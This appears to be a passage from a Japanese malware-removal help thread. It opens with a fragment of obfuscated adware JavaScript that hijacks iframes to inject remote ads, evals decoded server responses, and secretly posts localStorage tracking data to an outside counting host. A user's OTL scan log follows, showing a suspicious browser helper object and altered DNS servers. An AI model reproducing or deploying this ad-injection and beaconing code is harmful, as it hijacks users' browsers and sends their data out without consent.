c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.data||\"\")+\"\").indexOf(d+\"_IIIFAR\"))if(clearTimeout(c),window.removeEventListener(\"message\",h,!1),\n0==e.data.indexOf(d+\"_IIIFAR_\")){var g=b.l.decode(e.data.split(\"_\")[2]);a(!1,g)}else a(!0);else a(!0)}catch(k){a(!0)}};\"postMessage\"in window&&\"postMessage\"in(window.top||{})?(c=setTimeout(function(){window.document.removeEventListener(\"message\",h,!1);a(!0)},2E3),window.addEventListener(\"message\",h,!1),window.top.postMessage(b.l.encode(d+\"/\"+e+\"/\"+g)+\"_IIIFAR\",\"*\")):a(!0)},run:function(){adzy653rk.setMarker();var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var b=[],c=0;c<a.length;c++)stngs.checkif(a[c])||\nadzy653rk.checkIfPartner(a[c])||(a[c].setAttribute(adzy653rk.imp.rattr,\"true\"),a[c].setAttribute(\"replaced\",\"true\"),b.push(a[c]));if(b.length){var d=function(a){if(a>=b.length){var c=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+c.pid+\"&subid1=\"+c.hid+\"&subid2=\"+c.eid+\"&subid3=\"+c.prid+\"&lt=\"+c.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\n\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(c=adzy653rk.getAt(b[a]))(new PixelIPP).setParameter(\"size\",c).push(),adzy653rk.jbs.ifr.push(b[a]),adzy653rk.jbs.at.push(c);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},init:function(){var a=adzy653rk,b=typeof window;window.top===window?(a.listenForMessages(),a.run()):a.isAllowRunning(function(c,d){window.document.body.hasAttribute(\"data-\"+b)||(window.document.body.setAttribute(\"data-\"+\nb,c+\"\"),c&&a.run())})},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var b=function(c){c>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[c]&&adzy653rk.ifr[c]&&adzy653rk.ifr[c].src!=adzy653rk.src[c][0]&&!adzy653rk.checkIfPartner()&&adzy653rk.ifrset(adzy653rk.ifr[c],adzy653rk.src[c][1],1),setTimeout(function(){b(++c)},1))};b(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,\n1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.run,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var b=adzy653rk.imp.sizes,c=0;c<b.length;c++)if(a[0]>=b[c][0]-5&&a[0]<=b[c][0]+5&&a[1]>=b[c][1]-5&&a[1]<=b[c][1]+5)return b[c][2];return!1},getAds:function(a,b){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var c=\ndocument.createElement(\"script\");c.type=\"text/javascript\";c.src=a+\"&cb=adzy653rk.\"+b;try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(c)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[b](e.response)};e.send(null)}},seta:function(a){var b=[];try{var c=adzy653rk.l.decode(a),b=\"object\"==typeof JSON&&JSON.parse?JSON.parse(c):eval(c)}catch(d){}if(b instanceof\nArray)for(a=0;a<b.length;a++)b[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],b[a]);adzy653rk.destruct()},ifrset:function(a,b,c){c||(adzy653rk.ifr.push(a),b[0]=b[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(b[1]){case 1:a.src=b[0]+(-1<b[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+b[2]+\"_18x18_0\":\"\");break;case 2:a.src=\n\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+b[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+b[0]+d[1])}catch(g){}}c||adzy653rk.src.push([a.src,b])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),\ne=this.xlat.indexOf(a.charAt(c++)),g=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),f=(e&15)<<4|g>>2,l=(g&3)<<6|h,b=b+String.fromCharCode(d<<2|e>>4);64!=g&&0<f&&(b+=String.fromCharCode(f));64!=h&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)},_utf8_decode:function(a){for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt(c);if(128>d)b+=String.fromCharCode(d),c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+\n1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|g&63),c=c+3}return b},encode:function(a){a=this._utf8_encode(a);for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt(c++),e=a.charCodeAt(c++),g=a.charCodeAt(c++),h=d>>2,d=(d&3)<<4|e>>4,f=(e&15)<<2|g>>6,l=g&63;isNaN(e)?f=l=64:isNaN(g)&&(l=64);b=b+this.xlat.charAt(h)+this.xlat.charAt(d)+(64==f?\"=\":this.xlat.charAt(f))+(64==l?\"=\":this.xlat.charAt(l))}return b},_utf8_encode:function(a){if(a&&a.length){for(var b=\"\",c=0;c<a.length;c++){var d=\na.charCodeAt(c);128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}return a}}}};\nif( typeof adzy653rk !== \"undefined\")\n{adzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ad03.ctox.net enad.hanyibai.com ad.z5x.net ads.onimp03.com satellitetvoffer.co ad.yieldmanager.com fwwv.dixingwang.com cpm.cpc-ads.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net cpm.usabeautygame.com srv.aileronx.com vqtm.nongchangwangzhan.com mthd.laorenmeng.com ads.exoclick.com servedby.adsplats.com www.obo-lers.com ads.ad-maven.com ad.adnetwork.net cmne.197865.com cdn.adk2.com ads.qadservice.com Servedby.bigfineads.com a.ad-sys.com www.kbdadsfast.com s3-us-west-2.amazonaws.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info ad.improvemedianetwork.com zvmg.furongshangcheng.com cmen.197865.com ads.networkhm.com ads.impssrv.com nowst.63xmp.com media.glispa.com krea.laorenmeng.com tag.contextweb.com ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com khad.papace.com hnad.hanyibai.com nptv.nongchangwangzhan.com rtb-ads.avazu.net ads.ventivmedia.com ad.reachjunction.com pzez.nongchangwangzhan.com ads.mediawhite.com emkl.ozhgov.com cdn.a2ggroup.com cdn.ad-maven.com an.z5x.net tala.intlsources.com cemn.197865.com fw.adsafeprotected.com cher.ehomestudy.com mtvn.dixingwang.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()}})()}catch(e){};try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"bEwXA39b=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"bEwXA39b=\")){var d=a.match(/bEwXA39b=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ukchVWzmPhd97qTUMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rHU6pjw7qda7pjnErdg8pda8rn==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElement
  • あすとろ
  • 2015/09/12 (Sat) 23:41:05
返信フォームへ 
OTL2
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.4.0: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2015/02/17 13:17:40 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Extensions
[2015/09/07 23:12:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Firefox\Profiles\i4n38c5y.default\extensions
[2015/09/07 23:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/09/07 23:15:10 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.2.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa\1.1_0\

O1 HOSTS File: ([2015/06/14 18:09:04 | 000,000,855 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll (Oracle Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [ETDCtrl] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IntelTBRunOnce] wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs" File not found
O4:[b]64bit:[/b] - HKLM..\Run: [Launch LCore] C:\Program Files\Logicool Gaming Software\LCore.exe (Logitech Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [BackupManagerTray] C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [SuiteTray] C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe (Egis Technology Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [Dropbox Update] C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Dropbox, Inc.)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: DhcpNameServer = 192.168.50.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

ActiveX:[b]64bit:[/b] {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\system32\ieudinit.exe
ActiveX:[b]64bit:[/b] {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:[b]64bit:[/b] {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX:[b]64bit:[/b] {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
